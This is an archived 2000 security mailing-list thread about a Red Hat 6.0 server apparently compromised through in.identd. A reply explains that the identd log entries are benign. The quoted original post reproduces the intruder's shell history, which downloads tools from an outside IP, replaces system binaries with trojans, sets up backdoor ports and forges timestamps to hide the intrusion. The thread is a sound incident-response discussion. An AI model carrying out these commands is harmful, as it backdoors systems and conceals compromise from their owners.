|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Subject: Re: Rooted through in.identd on Red Hat 6.0
From: Jon Burdge (jburdge
AVENTAIL.COM)Date: Thu Apr 20 2000 - 11:34:39 CDT
- Next message: Vincent Sweeney: "Odd Firewall Entries"
- Previous message: Donald McLachlan: "weird traceroutes"
- Maybe in reply to: Del Elson: "Rooted through in.identd on Red Hat 6.0"
- Maybe reply: Jon Burdge: "Re: Rooted through in.identd on Red Hat 6.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Those requests appear to be the site he ftp'd to (ftp 200.192.58.201 21)
requesting the ident of who he was connecting as. It looks more like it was
just the ftp daemon on the remote site behaving appropriately.
> -----Original Message-----
> From: Del Elson [mailto:delBABEL.COM.AU]
> Sent: Tuesday, April 18, 2000 10:02 PM
> To: INCIDENTSSECURITYFOCUS.COM
> Subject: Rooted through in.identd on Red Hat 6.0
>
>
> Hi,
>
> A client was hacked last week by what looked like a buffer
> overflow through in.identd. This was on a Red Hat 6.0
> box.
>
> RH don't have any current security notices or fixes for
> in.identd on their servers, and I haven't seen other
> boxes hacked through in.identd recently.
>
> The hacker left the usual trace in /.bash_history, which
> ran like:
>
> mkdir /usr/lib/... ; cd /usr/lib/...
> ftp 200.192.58.201 21
> cd /usr/lib/...
> mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz?
> pstree.gz;
> mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz?
> syslogd.gz;
> mv tcpd.gz? tcpd.gz
> gzip -d *
> chmod +x *
> mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv
> syslogd /usr/sbin;
> mv pt07 /usr/lib/; mv pstree /usr/bin ;
> /usr/lib/pt07
> echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220
> ;
> echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
> echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220
> ;
> echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
> touch -t 199910122110 /dev/cui220
> touch -t 199910122110 /dev/cui221
> touch -t 199910122110 /usr/lib/pt07
> touch -t 199910122110 /usr/sbin/syslogd
> touch -t 199910122110 /usr/sbin/tcpd
> touch -t 199910122110 /bin/ps
> touch -t 199910122110 /bin/netstat
> touch -t 199910122110 /usr/bin/pstree
> cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
> mv /tmp/b /etc/inetd.conf
> killall -HUP inetd
>
> ... installing a back door and a partial cover of tracks.
>
> The only messages in /var/log/messages around the time
> were:
>
> Apr 8 23:15:57 home identd[12006]: Connection from
> 200.192.58.201
> Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 (
> 200.192.58.201 ) for: 1176, 21
> Apr 8 23:16:05 home identd[12007]: Connection from
> 200.192.58.201
> Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 (
> 200.192.58.201 ) for: 1176, 21
>
> ... the IP address traces back to somewhere in Brazil.
>
> Anyone know of any current bug notices, exploits, or
> patches for in.identd?
>
> Del
>
- Next message: Vincent Sweeney: "Odd Firewall Entries"
- Previous message: Donald McLachlan: "weird traceroutes"
- Maybe in reply to: Del Elson: "Rooted through in.identd on Red Hat 6.0"
- Maybe reply: Jon Burdge: "Re: Rooted through in.identd on Red Hat 6.0"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]